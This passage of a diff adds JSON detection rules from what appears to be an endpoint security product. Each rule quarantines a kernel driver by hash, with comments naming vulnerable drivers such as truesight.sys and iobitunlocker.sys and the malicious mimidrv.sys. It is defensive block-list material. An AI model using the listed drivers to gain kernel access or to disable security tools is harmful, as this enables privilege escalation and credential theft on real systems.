"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820490Z", + "creation_date": "2026-03-23T11:45:31.820493Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820500Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash",
+ "value": "6bec424bd6775c3ebc57fe1c6fe1d280e3f82d5b104eec2a75771bdfdff99148",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a5ff61e-9eab-56df-8e94-dd96c61ebfed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457306Z",
+ "creation_date": "2026-03-23T11:45:30.457310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ee89c1e8738d465d241630ccca4ce218afc02421461e6de91e4dc8133e9501c",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a635413-e89c-58fc-9d02-d1950fb34df0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613101Z",
+ "creation_date": "2026-03-23T11:45:29.613103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613108Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf",
+ "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a7601fe-2e2b-55ca-a611-56aeb43c5c39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829838Z",
+ "creation_date": "2026-03-23T11:45:31.829841Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829850Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69963e7c2ac52f1d796e40f9907056f574a93c973371e735e9d8436c7be9c565",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a84ec23-4eaa-56e3-bb1d-dfd46932604c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808358Z",
+ "creation_date": "2026-03-23T11:45:31.808360Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808366Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39eb433dcde3f3852be94f1cf39f125fdffdea0aaada2ff11d8b6004f518f22c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a88477f-20e6-5e32-937f-d16992068a3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.161038Z",
+ "creation_date": "2026-03-23T11:45:31.161041Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.161046Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26f46b7d452c0ec33e6bbfd1a4d8a5cf5cf1192163cd9bdff14fc2fec9168033",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a8caf00-804c-550a-b509-3be504ca5c73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825577Z",
+ "creation_date": "2026-03-23T11:45:30.825579Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825584Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "695b606b4b9ee6b825c57d4c6f869a9c076dc413301ef615f15b11dba5257320",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a8e0035-65ca-5687-a767-93737a9ccae0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828204Z",
+ "creation_date": "2026-03-23T11:45:30.828206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f882326961c4ec155a5b2b049bb663a75732e77073562bc17d98fab8368e4c1a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a92efbb-6a3b-52b5-af3f-f3bc92866646",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480598Z",
+ "creation_date": "2026-03-23T11:45:30.480600Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480605Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6945077a6846af3e4e2f6a2f533702f57e993c5b156b6965a552d6a5d63b7402",
+ "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a94391d-4bbf-5088-ae88-b0e45473c4f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815669Z",
+ "creation_date": "2026-03-23T11:45:30.815672Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815677Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da5e27b18d3c1403975a8e17431242f208621348264ebe770db8b07813a1a0f8",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a960e0b-d246-5b2a-9ac1-644b51975102",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142921Z",
+ "creation_date": "2026-03-23T11:45:32.142923Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142929Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d345b048fabc9d2013358fb20fca0eb441909129f1d81965eadad8c7f812886",
+ "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a982306-2b98-5ef4-8cde-8bbac05ae82c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826567Z",
+ "creation_date": "2026-03-23T11:45:30.826569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826575Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fb3ff6c62c48b9b2e81317be4d68d8bed5d81e28ce14ea51f6a2feeabee1458",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8aa5015c-7ecc-5b39-a5dd-72ab623e96f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821485Z",
+ "creation_date": "2026-03-23T11:45:31.821487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821493Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e314f9d7da2710735c800b07a22e309f795afce2de1f71a36e252b2ab71dad1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ab390eb-3266-5060-a812-1fedad7c53a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147006Z",
+ "creation_date": "2026-03-23T11:45:31.147008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147014Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d75cfd37fa1c5c4f59f7873265d2874859b510ce59c311303ffe0dd918c55689",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ab84a51-526e-5bef-ad9f-90c4d3cdd0fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480713Z",
+ "creation_date": "2026-03-23T11:45:30.480715Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39f137083e6c0200543e1f8d3c074f857d141bdb8c8f09338d48520537b881aa",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8aba0632-aa62-595e-9c0f-77d782dbc127",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819209Z",
+ "creation_date": "2026-03-23T11:45:31.819211Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819216Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e4d6ea7cdee57d72c81b114251868973ac2e5926231851daf1caecb3e5b15ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8abd4ca2-6da4-5396-ac1c-fff03b867b9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816165Z",
+ "creation_date": "2026-03-23T11:45:31.816169Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0856107633a46e065859058d26e23eea2aa4453bad323f48a0bf62af6acaa9e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8abe0a85-0703-5bcc-9d98-d234f28de712",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465922Z",
+ "creation_date": "2026-03-23T11:45:30.465925Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465934Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7cd14c71bcac5420872c3d825ff6d4be6a86f3d6a8a584f1a756541efff858e",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ac01645-6457-5d22-a393-5944070dd3c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606830Z",
+ "creation_date": "2026-03-23T11:45:29.606832Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606837Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab5324c992c7547020f85de3456516e0dba2c3c5aab10371723a96188354abaf",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ac7d3aa-f903-5b09-8dc7-f138725e5e70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492373Z",
+ "creation_date": "2026-03-23T11:45:31.492375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492380Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d94f2972957609972a179181b481a4bbe87dc9d8853444f10e3819c1919cc80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ac8c0f3-b99d-5301-989d-08bad2a206ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143559Z",
+ "creation_date": "2026-03-23T11:45:32.143561Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff55c1f308a5694eb66a3e9ba326266c826c5341c44958831a7a59a23ed5ecc8",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ad313a7-b2b4-5487-a45a-8353c5644239",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827434Z",
+ "creation_date": "2026-03-23T11:45:30.827436Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827441Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30f2147f48858f5aeaf2358a439e2467e47a9b4a57ccb72e0d4bb58d5cdecad9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ada037c-3088-5bec-9956-e56969017d89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613118Z",
+ "creation_date": "2026-03-23T11:45:29.613120Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
